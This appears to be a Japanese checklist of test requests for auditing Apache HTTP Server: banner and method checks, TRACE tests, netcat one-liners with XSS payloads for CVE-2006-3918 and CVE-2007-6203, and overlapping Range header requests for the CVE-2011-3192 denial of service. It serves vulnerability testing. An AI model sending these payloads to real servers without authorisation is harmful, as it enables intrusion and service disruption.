Apache HTTP Server チェック項目

バナー情報

HEAD / HTTP/1.0

使用可能なメソッド一覧

OPTIONS / HTTP/1.0

TRACEメソッドの有効/無効

TRACE / HTTP/1.0
TEST: TRACETEST

ExpectリクエストヘッダにおけるXSS (CVE-2006-3918)

# echo -en "GET / HTTP/1.0\nExpect: <script>alert("XSS");</script>\n\n" | nc www.example.co.jp 80

413エラーメッセージにおけるXSS (CVE-2007-6203)

# echo -en "<script>alert("XSS");</script> / HTTP/1.1\nContent-Length: 0\nContent-Length: 0\nHost: www.example.co.jp\n\n" | nc www.example.co.jp 80

Range Header DoS (CVE-2011-3192)

GET / HTTP/1.0
Range: bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10

GET / HTTP/1.0
Range: bytes=0-,1-
GET / HTTP/1.0
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx|before2_2_21